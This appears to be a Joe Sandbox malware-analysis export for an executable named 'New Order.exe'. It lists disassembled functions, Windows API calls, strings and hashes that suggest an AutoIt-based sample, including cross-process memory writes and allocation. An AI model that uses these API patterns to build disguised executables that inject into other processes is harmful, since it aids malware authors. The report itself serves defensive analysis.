Instruction ID: c1dd01239cd616a9b51712250c50448405b0e7def4af930a33dfd45701d6acc9
Opcode Fuzzy Hash: 191fc493a7813d993a78e29812047ab028e3e7cc1d002fd39627f07e8405a9f3
Instruction Fuzzy Hash: 36F03C31025706EFDB136F69ED1C7643B6DEB00366F048216F425661F0C73289A1DFA0

Function 002F0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 002F10F9
__freea.LIBCMT ref: 002F1117

Part of subcall function 002F1537: _free.LIBCMT ref: 002F154F

Strings

am/pm, xrefs: 002F117A
a/p, xrefs: 002F11DE

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: a4212cb9be1f5527f8b2d599d9c0134bc7b73770de8f9f232a53fc249e1cc863
Instruction ID: d489973c60c5467d49810a5f0f421482150359257efeecc9536f435dedd7d9d4
Opcode Fuzzy Hash: a4212cb9be1f5527f8b2d599d9c0134bc7b73770de8f9f232a53fc249e1cc863
Instruction Fuzzy Hash: C2D1E13193020FCADB289F68C855ABAF7B1EF05380FA401B9EB059B654D7759DB0CB91

Function 003461D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 002E0242: EnterCriticalSection.KERNEL32(0039070C,00391884,?,?,002D198B,00392518,?,?,?,002C12F9,00000000), ref: 002E024D
Part of subcall function 002E0242: LeaveCriticalSection.KERNEL32(0039070C,?,002D198B,00392518,?,?,?,002C12F9,00000000), ref: 002E028A

Part of subcall function 002E00A3: __onexit.LIBCMT ref: 002E00A9

__Init_thread_footer.LIBCMT ref: 00346238

Part of subcall function 002E01F8: EnterCriticalSection.KERNEL32(0039070C,?,?,002D8747,00392514), ref: 002E0202
Part of subcall function 002E01F8: LeaveCriticalSection.KERNEL32(0039070C,?,002D8747,00392514), ref: 002E0235

Part of subcall function 0033359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003335E4
Part of subcall function 0033359C: LoadStringW.USER32(00392390,?,00000FFF,?), ref: 0033360A

Strings

x#9, xrefs: 0034636F
x#9, xrefs: 00346353
x#9, xrefs: 0034633A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#9$x#9$x#9
API String ID: 1072379062-305294695
Opcode ID: 46cf4934c6e27f5da938baa574295ea7abfda315d7667bdcbf818017b7ecfa0f
Instruction ID: 0bc70814ace2ad0b616de72383c3801fb184a59e6ddba0052518b4a6dccf5af5
Opcode Fuzzy Hash: 46cf4934c6e27f5da938baa574295ea7abfda315d7667bdcbf818017b7ecfa0f
Instruction Fuzzy Hash: 18C18D71A00105AFCB16EF98C891EBEB7F9EF4A300F11816AF9059B291DB70ED55CB91

Function 002F8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 002F8B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 002F8B7A
__dosmaperr.LIBCMT ref: 002F8B81

Strings

.., xrefs: 002F8A63

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: ..
API String ID: 2434981716-1970295553
Opcode ID: e9f4ba3c9f02f539d5c6de5cc9acfb9b2e4203fa3c04ad4e443195a991ec28a2
Instruction ID: fb0680e1c2ed27a952625531dd96f6656985d54a71f211744ac7ba8072be0027
Opcode Fuzzy Hash: e9f4ba3c9f02f539d5c6de5cc9acfb9b2e4203fa3c04ad4e443195a991ec28a2
Instruction Fuzzy Hash: 69419C7162414DAFDB259F24D881A79FFA5DB45388F2841BAFA85C7242DE31CD228750

Function 00322716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0032B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003221D0,?,?,00000034,00000800,?,00000034), ref: 0032B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00322760

Part of subcall function 0032B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0032B3F8

Part of subcall function 0032B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0032B355
Part of subcall function 0032B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00322194,00000034,?,?,00001004,00000000,00000000), ref: 0032B365
Part of subcall function 0032B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00322194,00000034,?,?,00001004,00000000,00000000), ref: 0032B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003227CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0032281A

Strings

@, xrefs: 00322832

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: aa9fd9178458ae900e24af1ae33b93da20f8beda12c2ddb1ab8d420d9b6ec1b0
Instruction ID: c2f931fc80a6fac972fbe09f54fb6229d3497550a33a77ee74cb46bc3072b403
Opcode Fuzzy Hash: aa9fd9178458ae900e24af1ae33b93da20f8beda12c2ddb1ab8d420d9b6ec1b0
Instruction Fuzzy Hash: 4E413D76900228BFDB11DBA4DD81ADEBBB8EF05300F004055FA55B7191DB706E45CB60

Function 002F172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\New Order.exe,00000104), ref: 002F1769
_free.LIBCMT ref: 002F1834
_free.LIBCMT ref: 002F183E

Strings

C:\Users\user\Desktop\New Order.exe, xrefs: 002F1760, 002F1767, 002F1796, 002F17CE

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\New Order.exe
API String ID: 2506810119-4236868380
Opcode ID: 9f09c46d516740ccdf4ebc0799ac970c5389f67657f295f84d5cef3b2368fee4
Instruction ID: 9c93ed5fbd7af01d977f8611167f114aeab7b59bc103eab853af72261f180549
Opcode Fuzzy Hash: 9f09c46d516740ccdf4ebc0799ac970c5389f67657f295f84d5cef3b2368fee4
Instruction Fuzzy Hash: E9319371A1020DEFDB22EF999981DAEFBBCEB85390F504176EA0597211D7B04E60CB90

Function 0032C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0032C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0032C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00391990,015B66C0), ref: 0032C395

Strings

0, xrefs: 0032C2DF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 8858bc48f2be4bb141f868e822ce2057b59a7aa9b87052adf8faa0c5ba087edc
Instruction ID: 323d219438625095b59bd52cfb1ba3de11146d3149b2b7f863f45b449d36a7ca
Opcode Fuzzy Hash: 8858bc48f2be4bb141f868e822ce2057b59a7aa9b87052adf8faa0c5ba087edc
Instruction Fuzzy Hash: 5141F0352143519FD722DF25EC84B5EBBE8AF85320F009A1DFAA5972D1D734E904CB52

Function 00354416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0035CC08,00000000,?,?,?,?), ref: 003544AA
GetWindowLongW.USER32 ref: 003544C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 003544D7

Strings

SysTreeView32, xrefs: 0035447C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 668cc426d00f6824969efdfa4a6727251ad48e798fe41687b8c283db746b79c8
Instruction ID: 1d9aa2fd142266b2755d64e425e416b6d5d216560acc899e1b3944ff2a83ab4d
Opcode Fuzzy Hash: 668cc426d00f6824969efdfa4a6727251ad48e798fe41687b8c283db746b79c8
Instruction Fuzzy Hash: 1C31DA71250205AFDF268E38DC45FEA3BA9EB09329F214715FD39A21E0E730EC949B50

Function 00326E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00326EED
VariantCopyInd.OLEAUT32(?,?), ref: 00326F08
VariantClear.OLEAUT32(?), ref: 00326F12

Strings

*j2, xrefs: 00326E8B, 00326E90, 00326EF8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j2
API String ID: 2173805711-2640234633
Opcode ID: 92e794769fa3bbb10d5ef351e08a297f81a973485439f057e600d62556476b71
Instruction ID: 05f39b10ba1e75e97474b509486161e111c37c20d13f56e99f6bb79b84f7ccf8
Opcode Fuzzy Hash: 92e794769fa3bbb10d5ef351e08a297f81a973485439f057e600d62556476b71
Instruction Fuzzy Hash: A9317E71614265EFCF07AFA4F952DBD37B9EF85304F100599F8024B2A1C7349922DB90

Function 0034304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0034335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00343077,?,?), ref: 00343378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0034307A
_wcslen.LIBCMT ref: 0034309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00343106

Strings

255.255.255.255, xrefs: 00343095, 0034309A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 74796392ba597771c49822acc6f8ad2f34f120d838f7dea6a17d165c61c444ae
Instruction ID: 56693e0bd355133cda30be22ab2f8aa944edf979adf61e8ac01e1fc72da12f0e
Opcode Fuzzy Hash: 74796392ba597771c49822acc6f8ad2f34f120d838f7dea6a17d165c61c444ae
Instruction Fuzzy Hash: EE31F539204201DFCB12DF28C485E6977E0EF14318F258199E8168F792DB31FE41CB60

Function 00354653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00354705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00354713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0035471A

Strings

msctls_updown32, xrefs: 00354684

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: bf40523423cb3edfb03c963d8b2d8fd5f3f471e05db89d70aa9ac10f1db5a818
Instruction ID: c0764f80821f0d49464ac47a001da890818a9ec8de9bc19454232872c4f1155d
Opcode Fuzzy Hash: bf40523423cb3edfb03c963d8b2d8fd5f3f471e05db89d70aa9ac10f1db5a818
Instruction Fuzzy Hash: 9E21A1B5600209AFDB16DF64DCC1DB737ADEF4A399B050049FA109B261CB31EC55CBA0

Function 003295AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0032961D

Strings

#OnAutoItStartRegister, xrefs: 003295F3
#requireadmin, xrefs: 003295D9
#notrayicon, xrefs: 003295B7

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 46029bf7f90de1f61b87338f4721789692c2e736b26e1b883f5a56dd718bcc70
Instruction ID: a1ff3a40c1c1bd28f65ff55978ed1bbe78ba59e6ff98a7e95116ca076a632036
Opcode Fuzzy Hash: 46029bf7f90de1f61b87338f4721789692c2e736b26e1b883f5a56dd718bcc70
Instruction Fuzzy Hash: 622165322142206AC333AA25AC02FBB73DC9F92320F64402BF98997081EB50AD55C6A5

Function 003537B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00353840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00353850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00353876

Strings

Listbox, xrefs: 0035380F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a4f32c50859c6215e741e4f827a92237edd725e079a29b137e7f1659f32d7b05
Instruction ID: da703f1f7809b7453d8647492fa5e52bca2dc37530e89a748846c4e95a93680f
Opcode Fuzzy Hash: a4f32c50859c6215e741e4f827a92237edd725e079a29b137e7f1659f32d7b05
Instruction Fuzzy Hash: A821C272610218BFEF128F64CC45FBB376EEF89795F118114F910AB1A0C671DC568BA0

Function 003349F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00334A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00334A5C
SetErrorMode.KERNEL32(00000000,?,?,0035CC08), ref: 00334AD0

Strings

%lu, xrefs: 00334A6F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: ca12bae434256a4ab9e68f3209b066376247f6ee9f4e6fc23d5e390698c879b9
Instruction ID: 7dcf68dba8f1278acf7979fa9f5774d64d57ff8ceddaf51bf306166ac81a6a88
Opcode Fuzzy Hash: ca12bae434256a4ab9e68f3209b066376247f6ee9f4e6fc23d5e390698c879b9
Instruction Fuzzy Hash: 58314175A00209AFDB11DF54C985EAA7BF8EF08308F148099F905DB262D771EE45CF61

Function 003541EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0035424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00354264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00354271

Strings

msctls_trackbar32, xrefs: 00354226

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 5858358acef230d52d31809ac0a7e69fcbc8f7b518551a2e58a0d1785c572b4c
Instruction ID: a0fba1367efb367f8a4b0a99fb73d7a8f501f9debbb86e975d356df556d8ceea
Opcode Fuzzy Hash: 5858358acef230d52d31809ac0a7e69fcbc8f7b518551a2e58a0d1785c572b4c
Instruction Fuzzy Hash: 80110631240308BEEF225F29CC06FAB7BACEF85B59F120514FE55E60A0D271DC519B20

Function 00322F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002C6B57: _wcslen.LIBCMT ref: 002C6B6A

Part of subcall function 00322DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00322DC5
Part of subcall function 00322DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00322DD6
Part of subcall function 00322DA7: GetCurrentThreadId.KERNEL32 ref: 00322DDD
Part of subcall function 00322DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00322DE4

GetFocus.USER32 ref: 00322F78

Part of subcall function 00322DEE: GetParent.USER32(00000000), ref: 00322DF9

GetClassNameW.USER32(?,?,00000100), ref: 00322FC3
EnumChildWindows.USER32(?,0032303B), ref: 00322FEB

Strings

%s%d, xrefs: 00322FFF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 679b49605441f376b6ca20ec00e31c3d8f35d57ad53a46a9a1ec617b836b389b
Instruction ID: 972cb960d087ca4d873a87e53981a15f5ac7abbf3b7387e2666df7998689bef7
Opcode Fuzzy Hash: 679b49605441f376b6ca20ec00e31c3d8f35d57ad53a46a9a1ec617b836b389b
Instruction Fuzzy Hash: C811E4712003156BCF02BF749C95FEE37AAAF84308F048079F909AB252DE349A498B70

Function 00355882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003558C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003558EE
DrawMenuBar.USER32(?), ref: 003558FD

Strings

0, xrefs: 0035588F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 307e8150491187f484b04d55ded8e2d01a3f0d7efedac415b41b29f9bf82e93e
Instruction ID: 1bd2148da1e388c7243a0498f5856e66f2c2364fa3e2b3ccc6fbb42d0da9d3c2
Opcode Fuzzy Hash: 307e8150491187f484b04d55ded8e2d01a3f0d7efedac415b41b29f9bf82e93e
Instruction Fuzzy Hash: 1701A131510208EFDB129F51DC44FAEBBB8FB45362F108099E849D6271DB309A94DF60

Function 0031D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0031D3BF
FreeLibrary.KERNEL32 ref: 0031D3E5

Strings

X64, xrefs: 0031D2A8
GetSystemWow64DirectoryW, xrefs: 0031D3B9

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
